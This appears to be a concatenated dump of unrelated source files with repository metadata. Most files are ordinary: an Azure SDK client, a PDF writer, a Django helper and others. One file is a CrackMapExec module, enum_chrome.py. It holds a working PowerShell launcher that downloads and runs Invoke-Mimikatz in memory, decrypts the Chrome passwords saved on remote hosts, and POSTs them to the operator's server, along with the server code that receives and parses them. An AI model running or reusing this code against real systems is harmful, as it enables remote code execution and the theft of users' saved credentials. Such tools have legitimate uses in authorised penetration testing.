raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
deserialized = self._deserialize('KeyValue', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
delete_lock.metadata = {'url': '/locks/{key}'} # type: ignore
def get_revisions(
self,
key: Optional[str] = None,
label: Optional[str] = None,
after: Optional[str] = None,
accept_datetime: Optional[str] = None,
select: Optional[List[Union[str, "_models.Enum4"]]] = None,
**kwargs
) -> AsyncIterable["_models.KeyValueListResult"]:
"""Gets a list of key-value revisions.
Gets a list of key-value revisions.
:param key: A filter used to match keys.
:type key: str
:param label: A filter used to match labels.
:type label: str
:param after: Instructs the server to return elements that appear after the element referred to
by the specified token.
:type after: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:param select: Used to select what fields are present in the returned resource(s).
:type select: list[str or ~azure.appconfiguration.models.Enum4]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either KeyValueListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.appconfiguration.models.KeyValueListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyValueListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
accept = "application/vnd.microsoft.appconfig.kvset+json, application/json, application/problem+json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_revisions.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if key is not None:
query_parameters['key'] = self._serialize.query("key", key, 'str')
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if after is not None:
query_parameters['After'] = self._serialize.query("after", after, 'str')
if select is not None:
query_parameters['$Select'] = self._serialize.query("select", select, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('KeyValueListResult', pipeline_response)
list_of_elem = deserialized.items
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_revisions.metadata = {'url': '/revisions'} # type: ignore
async def check_revisions(
self,
key: Optional[str] = None,
label: Optional[str] = None,
after: Optional[str] = None,
accept_datetime: Optional[str] = None,
select: Optional[List[Union[str, "_models.Enum5"]]] = None,
**kwargs
) -> None:
"""Requests the headers and status of the given resource.
Requests the headers and status of the given resource.
:param key: A filter used to match keys.
:type key: str
:param label: A filter used to match labels.
:type label: str
:param after: Instructs the server to return elements that appear after the element referred to
by the specified token.
:type after: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:param select: Used to select what fields are present in the returned resource(s).
:type select: list[str or ~azure.appconfiguration.models.Enum5]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
# Construct URL
url = self.check_revisions.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if key is not None:
query_parameters['key'] = self._serialize.query("key", key, 'str')
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if after is not None:
query_parameters['After'] = self._serialize.query("after", after, 'str')
if select is not None:
query_parameters['$Select'] = self._serialize.query("select", select, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
request = self._client.head(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
response_headers = {}
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
if cls:
return cls(pipeline_response, None, response_headers)
check_revisions.metadata = {'url': '/revisions'} # type: ignore
| [
"[email protected]"
] | |
303c660e3eef57e3a36afb062ecd39b07d4bc99b | 58df224689ab08c99359b1a6077d2fba3728dc61 | /lamda-ocr/merge-files/borb/io/write/page/write_pages_transformer.py | 68627bae287b7b3e25fae919b97dba2be46afbac | [] | no_license | LIT-Midas/LITHackathon | 2b286728c156d79d3f426f6d19b160a2a04690db | 7b990483dd48b91cf3ec3452b78ab67770da71af | refs/heads/main | 2023-08-13T05:22:59.373965 | 2021-08-16T01:09:49 | 2021-08-16T01:09:49 | 395,024,729 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,106 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This implementation of WriteBaseTransformer is responsible
for writing Dictionary objects of \Type \Pages
"""
import logging
import typing
from typing import Optional
from borb.io.read.types import AnyPDFType, Dictionary, Name, Reference
from borb.io.write.object.write_dictionary_transformer import WriteDictionaryTransformer
from borb.io.write.write_base_transformer import WriteTransformerState
logger = logging.getLogger(__name__)
class WritePagesTransformer(WriteDictionaryTransformer):
"""
This implementation of WriteBaseTransformer is responsible
for writing Dictionary objects of \Type \Pages
"""
def can_be_transformed(self, any: AnyPDFType):
"""
This function returns True if the object to be converted represents a \Pages Dictionary
"""
return isinstance(any, Dictionary) and "Type" in any and any["Type"] == "Pages"
def transform(
self,
object_to_transform: AnyPDFType,
context: Optional[WriteTransformerState] = None,
):
"""
This method writes a \Pages Dictionary to a byte stream
"""
assert isinstance(object_to_transform, Dictionary)
assert (
context is not None
), "A WriteTransformerState must be defined in order to write Pages Dictionary objects."
# \Kids can be written immediately
object_to_transform[Name("Kids")].set_can_be_referenced(False)
# queue writing of \Page objects
queue: typing.List[AnyPDFType] = []
for i, k in enumerate(object_to_transform["Kids"]):
queue.append(k)
ref: Reference = self.get_reference(k, context)
object_to_transform["Kids"][i] = ref
# delegate to super
super(WritePagesTransformer, self).transform(object_to_transform, context)
# write \Page objects
for p in queue:
self.get_root_transformer().transform(p, context)
# restore \Kids
for i, k in enumerate(queue):
object_to_transform["Kids"][i] = k
| [
"[email protected]"
] | |
b7e12c3f4b2d45fded162877ad86427111a6fb38 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03437/s315998808.py | e3d8b6ff4e9f3533a8b2b47253c581f3b116e5da | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 64 | py | X,Y=map(int,input().split())
if X%Y==0: print(-1)
else: print(X) | [
"[email protected]"
] | |
76f98d3da0ade232f07aceecf15d6408af840350 | 678770fcff8f01340dbea76bdc255a7f7dae7ce8 | /cme/modules/enum_chrome.py | ee01a980d9512560b1ee464fca2e648ed8eb3c60 | [
"BSD-2-Clause"
] | permissive | archey/CrackMapExec | 8a60d8f84332234636689dc448d6e58ae86bb02c | 3d010ea2f0321908f28bae5ba814a453e3d9b215 | refs/heads/master | 2021-01-12T04:13:22.955299 | 2016-12-28T18:23:31 | 2016-12-28T18:23:31 | 77,552,171 | 1 | 0 | null | 2016-12-28T18:12:49 | 2016-12-28T18:12:48 | null | UTF-8 | Python | false | false | 5,519 | py | from cme.helpers import create_ps_command, get_ps_script, obfs_ps_script, validate_ntlm, write_log
from datetime import datetime
from StringIO import StringIO
import re
class CMEModule:
'''
Executes PowerSploit's Invoke-Mimikatz.ps1 script (Mimikatz's DPAPI Module) to decrypt saved Chrome passwords
Module by @byt3bl33d3r
'''
name = 'enum_chrome'
description = "Uses Powersploit's Invoke-Mimikatz.ps1 script to decrypt saved Chrome passwords"
chain_support = False
def options(self, context, module_options):
'''
'''
return
def launcher(self, context, command):
'''
Oook.. Think my heads going to explode
So Mimikatz's DPAPI module requires the path to Chrome's database in double quotes otherwise it can't interpret paths with spaces.
Problem is Invoke-Mimikatz interpretes double qoutes as seperators for the arguments to pass to the injected mimikatz binary.
As far as I can figure out there is no way around this, hence we have to first copy Chrome's database to a path without any spaces and then decrypt the entries with Mimikatz
'''
launcher = '''
$cmd = "privilege::debug sekurlsa::dpapi"
$userdirs = get-childitem "$Env:SystemDrive\Users"
foreach ($dir in $userdirs) {{
$LoginDataPath = "$Env:SystemDrive\Users\$dir\AppData\Local\Google\Chrome\User Data\Default\Login Data"
if ([System.IO.File]::Exists($LoginDataPath)) {{
$rand_name = -join ((65..90) + (97..122) | Get-Random -Count 7 | % {{[char]$_}})
$temp_path = "$Env:windir\Temp\$rand_name"
Copy-Item $LoginDataPath $temp_path
$cmd = $cmd + " `"dpapi::chrome /in:$temp_path`""
}}
}}
$cmd = $cmd + " exit"
IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-Mimikatz.ps1');
$creds = Invoke-Mimikatz -Command $cmd;
$request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
$request.Method = 'POST';
$request.ContentType = 'application/x-www-form-urlencoded';
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();'''.format(server=context.server,
port=context.server_port,
addr=context.localip)
return create_ps_command(launcher)
def payload(self, context, command):
'''
Since the chrome decryption feature is relatively new, I had to manully compile the latest Mimikatz version,
update the base64 encoded binary in the Invoke-Mimikatz.ps1 script
and apply a patch that @gentilkiwi posted here https://github.com/PowerShellMafia/PowerSploit/issues/147 for the newer versions of mimikatz to work when injected.
Here we call the updated PowerShell script instead of PowerSploits version
'''
with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
return obfs_ps_script(ps_script.read())
def on_admin_login(self, context, connection, launcher, payload):
connection.execute(launcher, methods=['smbexec', 'atexec'])
context.log.success('Executed launcher')
def on_request(self, context, request, launcher, payload):
if 'Invoke-Mimikatz.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(payload)
else:
request.send_response(404)
request.end_headers()
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.getheader('content-length'))
data = response.rfile.read(length)
#We've received the response, stop tracking this host
response.stop_tracking_host()
if len(data):
buf = StringIO(data).readlines()
creds = []
try:
i = 0
while i < len(buf):
if ('URL' in buf[i]):
url = buf[i].split(':', 1)[1].strip()
user = buf[i+1].split(':', 1)[1].strip()
passw = buf[i+3].split(':', 1)[1].strip()
creds.append({'url': url, 'user': user, 'passw': passw})
i += 1
if creds:
context.log.success('Found saved Chrome credentials:')
for cred in creds:
context.log.highlight('URL: ' + cred['url'])
context.log.highlight('Username: ' + cred['user'])
context.log.highlight('Password: ' + cred['passw'])
context.log.highlight('')
except:
context.log.error('Error parsing Mimikatz output, please check log file manually for possible credentials')
log_name = 'EnumChrome-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(data, log_name)
context.log.info("Saved Mimikatz's output to {}".format(log_name))
| [
"[email protected]"
] | |
00d2631d286f49fce9f9cd2239ebf7a8d7d64789 | c0665729c9d6d9981df3525a2937dbf82650e023 | /migrations/versions/88cf82c03451_.py | b041896d1e10abcc32ef4c59b6be6f11313d9fc8 | [] | no_license | anaf007/t923 | 3ebef05801904456953e128a9059db3c52252dc1 | 078d2c566c77afa2ca1be7663d3c23c9f0ecddac | refs/heads/master | 2020-03-25T08:39:01.200735 | 2018-12-12T14:56:59 | 2018-12-12T14:56:59 | 143,625,550 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 940 | py | """empty message
Revision ID: 88cf82c03451
Revises: d61c3c0d0a4a
Create Date: 2018-08-05 21:38:07.000959
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = '88cf82c03451'
down_revision = 'd61c3c0d0a4a'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('users', sa.Column('is_center', sa.Boolean(), nullable=True))
op.alter_column('users', 'email',
existing_type=mysql.VARCHAR(length=80),
nullable=True)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('users', 'email',
existing_type=mysql.VARCHAR(length=80),
nullable=False)
op.drop_column('users', 'is_center')
# ### end Alembic commands ###
| [
"[email protected]"
] | |
6bb116d3f2cf2ad70af121abb33e58ed43bf50c3 | 98158b9e965e72b5a296be193931ce108bf0519e | /src/main/python/systemds/operator/algorithm/builtin/correctTypos.py | acbd0f9448f3e79f19f34fcd1d6dd511d21ccec2 | [
"Apache-2.0"
] | permissive | Shafaq-Siddiqi/systemml | 88dabaddf4763376bfcc46dc0f961ee9ab1cd438 | fecc4df3d6a9bba48d3ed72f6abcb7d3ce5582bf | refs/heads/main | 2023-04-27T14:22:05.333433 | 2022-05-22T10:08:06 | 2022-05-22T10:08:06 | 251,010,104 | 0 | 0 | Apache-2.0 | 2023-01-31T02:04:28 | 2020-03-29T10:54:14 | Java | UTF-8 | Python | false | false | 2,289 | py | # -------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -------------------------------------------------------------
# Autogenerated By : src/main/python/generator/generator.py
# Autogenerated From : scripts/builtin/correctTypos.dml
from typing import Dict, Iterable
from systemds.operator import OperationNode, Matrix, Frame, List, MultiReturn, Scalar
from systemds.script_building.dag import OutputType
from systemds.utils.consts import VALID_INPUT_TYPES
def correctTypos(strings: Frame,
**kwargs: Dict[str, VALID_INPUT_TYPES]):
"""
:param frequency_threshold: Strings that occur above this frequency level will not be corrected
:param distance_threshold: Max distance at which strings are considered similar
:param is_verbose: Print debug information
:return: 'OperationNode' containing
"""
params_dict = {'strings': strings}
params_dict.update(kwargs)
vX_0 = Frame(strings.sds_context, '')
vX_1 = Scalar(strings.sds_context, '')
vX_2 = Scalar(strings.sds_context, '')
vX_3 = Matrix(strings.sds_context, '')
vX_4 = Frame(strings.sds_context, '')
output_nodes = [vX_0, vX_1, vX_2, vX_3, vX_4, ]
op = MultiReturn(strings.sds_context, 'correctTypos', output_nodes, named_input_nodes=params_dict)
vX_0._unnamed_input_nodes = [op]
vX_1._unnamed_input_nodes = [op]
vX_2._unnamed_input_nodes = [op]
vX_3._unnamed_input_nodes = [op]
vX_4._unnamed_input_nodes = [op]
return op
| [
"[email protected]"
] | |
ce2a20b6cfa253ad34430502e424c381538ed45a | 7f5fa529f558853bf127a6f8f08d954121633542 | /pdm/_vendor/halo/halo_notebook.py | de595ff9c6ba0cba51b01c395a483b668acbe9eb | [
"MIT"
] | permissive | jeverling/pdm | 60335cc9912455c17a2fbbdf468f7f39c6cf943a | 22bb6a9cba5ded7dee688770f5f48f768e09bb65 | refs/heads/main | 2023-08-29T18:01:25.444405 | 2021-11-14T13:03:18 | 2021-11-14T13:03:18 | 427,973,885 | 1 | 0 | MIT | 2021-11-14T16:01:12 | 2021-11-14T16:01:12 | null | UTF-8 | Python | false | false | 3,219 | py | from __future__ import absolute_import, print_function, unicode_literals
import sys
import threading
import pdm._vendor.halo.cursor as cursor
from pdm._vendor.halo import Halo
from pdm._vendor.halo._utils import colored_frame, decode_utf_8_text
class HaloNotebook(Halo):
def __init__(
self,
text="",
color="cyan",
text_color=None,
spinner=None,
placement="left",
animation=None,
interval=-1,
enabled=True,
stream=sys.stdout,
):
super(HaloNotebook, self).__init__(
text=text,
color=color,
text_color=text_color,
spinner=spinner,
placement=placement,
animation=animation,
interval=interval,
enabled=enabled,
stream=stream,
)
self.output = self._make_output_widget()
def _make_output_widget(self):
from ipywidgets.widgets import Output
return Output()
# TODO: using property and setter
def _output(self, text=""):
return ({"name": "stdout", "output_type": "stream", "text": text},)
def clear(self):
if not self.enabled:
return self
with self.output:
self.output.outputs += self._output("\r")
self.output.outputs += self._output(self.CLEAR_LINE)
self.output.outputs = self._output()
return self
def _render_frame(self):
frame = self.frame()
output = "\r{}".format(frame)
with self.output:
self.output.outputs += self._output(output)
def start(self, text=None):
if text is not None:
self.text = text
if not self.enabled or self._spinner_id is not None:
return self
if self._stream.isatty():
cursor.hide()
self.output = self._make_output_widget()
from IPython.display import display
display(self.output)
self._stop_spinner = threading.Event()
self._spinner_thread = threading.Thread(target=self.render)
self._spinner_thread.setDaemon(True)
self._render_frame()
self._spinner_id = self._spinner_thread.name
self._spinner_thread.start()
return self
def stop_and_persist(self, symbol=" ", text=None):
"""Stops the spinner and persists the final frame to be shown.
Parameters
----------
symbol : str, optional
Symbol to be shown in final frame
text: str, optional
Text to be shown in final frame
Returns
-------
self
"""
if not self.enabled:
return self
symbol = decode_utf_8_text(symbol)
if text is not None:
text = decode_utf_8_text(text)
else:
text = self._text["original"]
text = text.strip()
if self._text_color:
text = colored_frame(text, self._text_color)
self.stop()
output = "\r{} {}\n".format(
*[(text, symbol) if self._placement == "right" else (symbol, text)][0]
)
with self.output:
self.output.outputs = self._output(output)
| [
"[email protected]"
] | |
e060e41da085c54baadaffc2295a417a6d40a2f6 | b7b2f80ab5e1ee0ea028576e3014b62b8d3a8d7e | /pyfile/pyfm-010/fileicon.py | d0093c6c5e2653257b83e914445cef0f5980e4b0 | [] | no_license | pglen/pgpygtk | 4d1405478a714f003984cf3e3db04ff1f767470b | 33f58010e304f1a312f2356de453ecedb7aa21ef | refs/heads/master | 2021-01-22T01:18:52.238415 | 2019-01-01T01:37:24 | 2019-01-01T01:37:24 | 102,215,955 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,298 | py | #!/usr/bin/env python
#
# 3D File Manager in Python OpenGL, helper routines
#
import math, sys, subprocess
import gtk.gtkgl
from OpenGL.GL import *
from OpenGL.GLU import *
#from gtk.gtkgl.apputils import *
from OpenGL.GL.ARB.multitexture import *
class FileIcon():
def __init__(self, self2, fname, txt, command, xpos = 0, ypos = 0, zpos = 0):
global gl_name
self.pixbuf2 = None
self.command = command
self.self2 = self2
self.txt = txt; self.fname = fname
self.xpos = xpos; self.ypos = ypos; self.zpos = zpos
self.myname = self2.nextname()
self.focus = False
try:
pixbuf = gtk.gdk.pixbuf_new_from_file(fname)
except:
print "No image."
return
if not pixbuf.get_has_alpha():
#print "Adding Alpha", fname
#pixbuf.add_alpha(False, 255,255,255)
pixbuf.add_alpha(True, 0, 0, 0)
www = 256; hhh = 256
self.pixbuf2 = gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB, True, 8, www, hhh)
pixbuf.scale(self.pixbuf2, 0, 0, www, hhh,
0, 0, float(www)/pixbuf.get_width(), float(hhh)/pixbuf.get_height(),
gtk.gdk.INTERP_BILINEAR)
def draw(self, pos_y, angle):
if not self.pixbuf2:
print "No image", self.fname
return
glPushMatrix ()
#print glGetString(GL_EXTENSIONS)
#glEnable(GL_TEXTURE_2D)
# Check the extension availability.
#if not glInitMultitextureARB():
# print "Help! No GL_ARB_multitexture"
# sys.exit(1)
glTranslatef (self.xpos, self.ypos - pos_y, self.zpos)
glRotatef (angle, 0.0, 1.0, 0.0)
siz = .4
glPushMatrix ()
exten = self.self2.font8.extent3Dstr(self.txt)
glTranslatef (-exten[0]/2, -siz * 1.5, 0.1)
self.self2.font8.print3Dstr(self.txt)
glPopMatrix ()
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP)
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP)
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_R, GL_CLAMP)
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_EDGE)
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE)
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_R, GL_CLAMP_TO_EDGE)
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_REPEAT)
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_REPEAT)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
glTexEnvf(GL_TEXTURE_ENV, GL_TEXTURE_ENV_MODE, GL_DECAL)
#glPixelStorei(GL_UNPACK_ALIGNMENT, 1)
#glPixelStorei(GL_UNPACK_SKIP_ROWS, 0)
#glPixelStorei(GL_UNPACK_SKIP_PIXELS, 0)
#glPixelStorei(GL_UNPACK_ROW_LENGTH, 0)
glEnable(GL_TEXTURE_2D)
glActiveTextureARB(GL_TEXTURE0_ARB)
ww = self.pixbuf2.get_height(); hh = self.pixbuf2.get_width()
#print ww, hh
glTexImage2D(GL_TEXTURE_2D, 0, 3, ww, hh, 0, GL_RGBA,
GL_UNSIGNED_BYTE, self.pixbuf2.get_pixels() )
glLoadName(self.myname)
#glPassThrough(self.myname)
glBegin(GL_QUADS)
# Bottom Left
glMultiTexCoord2fARB(GL_TEXTURE0_ARB, 0.0, 1.0)
glVertex3f(-siz, -siz, .0)
# Bottom Right
glMultiTexCoord2fARB(GL_TEXTURE0_ARB, 1.0, 1.0)
glVertex3f( siz, -siz, .0)
# Top Right
glMultiTexCoord2fARB(GL_TEXTURE0_ARB, 1.0, 0.0)
glVertex3f( siz, siz, .0)
# Top Left
glMultiTexCoord2fARB(GL_TEXTURE0_ARB, 0.0, 0.0)
glVertex3f(-siz, siz, .0)
glEnd()
glDisable(GL_TEXTURE_2D)
# Focus
if self.focus:
#print "focus"
mat_ambient = [ 0.6, 0.6, 0.6, 1.0 ]
glMaterialfv (GL_FRONT, GL_AMBIENT, mat_ambient)
glBegin(GL_QUADS)
x1 = -siz; x2 = siz
y1 = siz; y2 = -siz
linegap = 0.01; depth = 0.01
yf = y1 + linegap
glVertex3f(x1, y1, 0 - depth)
glVertex3f(x2, y1, 0 - depth)
glVertex3f(x2, yf, 0 - depth)
glVertex3f(x1, yf, 0 - depth)
yf = y2 - linegap
glVertex3f(x1, y2, 0 - depth)
glVertex3f(x2, y2, 0 - depth)
glVertex3f(x2, yf, 0 - depth)
glVertex3f(x1, yf, 0 - depth)
xf = x1 - linegap
glVertex3f(xf, y1, 0 - depth)
glVertex3f(x1, y1, 0 - depth)
glVertex3f(x1, y2, 0 - depth)
glVertex3f(xf, y2, 0 - depth)
xf = x2 + linegap
glVertex3f(xf, y1, 0 - depth)
glVertex3f(x2, y1, 0 - depth)
glVertex3f(x2, y2, 0 - depth)
glVertex3f(xf, y2, 0 - depth)
glEnd()
glPopMatrix ()
def do_exec(self):
print "Exec", self.txt
try:
ret = subprocess.Popen([self.command,])
except:
print"\n Cannot launch ", self.command
a,b,c = sys.exc_info()
print sys.excepthook(a,b,c)
def motion(self, event):
#print "fileicon motion", event
pass
def button(self, res, event):
if self.myname in res.names:
got = True
else:
got = False
if event.type == gtk.gdk.BUTTON_PRESS:
if got:
self.focus = True
else:
self.focus = False
if event.type == gtk.gdk._2BUTTON_PRESS:
if got:
self.do_exec()
| [
"[email protected]"
] | |
5244b3066e5f11804f7748f54801fe61074231b7 | b518fdfe5e0d26c384ae4d7770a1c16134640462 | /lms/migrations/0020_auto_20200820_1703.py | 2bce2e6daab456377d80864d6755f354b775400d | [] | no_license | ravichandra99/forlms | 70c43fa8e6e4475b7b18c247e490fc3d4dcb86a1 | ea43cdef75e2984b0a093ad6a0143ef730bfbab5 | refs/heads/master | 2022-12-05T23:03:54.909261 | 2020-08-24T06:21:28 | 2020-08-24T06:21:28 | 289,515,731 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 571 | py | # Generated by Django 3.0.8 on 2020-08-20 11:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('lms', '0019_auto_20200820_1702'),
]
operations = [
migrations.AlterField(
model_name='course',
name='faq',
field=models.ManyToManyField(blank=True, to='lms.FAQ'),
),
migrations.AlterField(
model_name='course',
name='project',
field=models.ManyToManyField(blank=True, to='lms.Project'),
),
]
| [
"[email protected]"
] | |
963c3c937ebbc170044186ef1b7d0d69c25594e3 | 30ac8484a6318a14c1a18994506b476522a8518f | /recipe_modules/futures/__init__.py | bde85606e48b93f60291bc6ae6239efcca9a8680 | [
"Apache-2.0"
] | permissive | Quantum-Platinum-Cloud/recipes-py | 69ee248035c4bf582088d064f1acefbf2ecedaf0 | b60bb0d221df01a41a175daf18632ec0525f20f1 | refs/heads/main | 2023-05-30T13:45:07.673046 | 2023-05-25T19:06:27 | 2023-05-25T19:06:27 | 646,251,290 | 1 | 0 | null | 2023-05-27T19:17:34 | 2023-05-27T19:17:33 | null | UTF-8 | Python | false | false | 162 | py | # Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
| [
"[email protected]"
] | |
87c28f9695b7880bf6642fae0143c7b660d07d56 | a5e5d39f42f468d35f18aab3e78c3c090046b0df | /apps/countdown_letters/utils.py | 34d0cb8777eb356f5c90822ce23bf70b8317f8e0 | [] | no_license | WayneLambert/portfolio | 66198dfc18b3f254e6bc726575903c3e8f570dc4 | 7e02165386e4784f81e15bae0325a77cf45f410d | refs/heads/main | 2023-02-04T18:08:13.559223 | 2023-01-29T14:13:59 | 2023-01-29T14:13:59 | 180,239,669 | 5 | 1 | null | 2023-02-04T07:07:10 | 2019-04-08T22:02:22 | JavaScript | UTF-8 | Python | false | false | 1,860 | py | from urllib.parse import urlencode
from django.urls import reverse
from apps.countdown_letters import logic
from apps.countdown_letters.models import LettersGame
def build_game_screen_url(num_vowels_selected: int) -> str:
"""
Builds the game screen's URL based upon the game's logic for
choosing the letters for the game.
"""
letters_chosen = logic.get_letters_chosen(num_vowels=num_vowels_selected)
base_url = reverse('countdown_letters:game')
letters_chosen_url = urlencode({'letters_chosen': letters_chosen})
return f"{base_url}?{letters_chosen_url}"
def build_results_screen_url(letters_chosen: str, players_word: str) -> str:
"""
Builds the results screen's URL based upon the game's chosen letters
and the player's selected word.
"""
base_url = reverse('countdown_letters:results')
letters_chosen_url = urlencode({'letters_chosen': letters_chosen})
players_word_url = urlencode({'players_word': players_word})
return f"{base_url}?{letters_chosen_url}&{players_word_url}"
def create_record(context: dict):
"""
Following context dictionary validations within the view process,
posts the results to the database for reference and later retrieval.
"""
LettersGame.objects.create(
letters_chosen=context['letters_chosen'],
players_word=context['players_word'],
comp_word=context['comp_word'],
eligible_answer=context['eligible_answer'],
winning_word=context['winning_word'],
player_word_len=context['player_word_len'],
comp_word_len=context['comp_word_len'],
player_score=context['player_score'],
comp_score=context['comp_score'],
definition=context['definition_data']['definition'],
word_class=context['definition_data']['word_class'],
result=context['result'],
)
| [
"[email protected]"
] | |
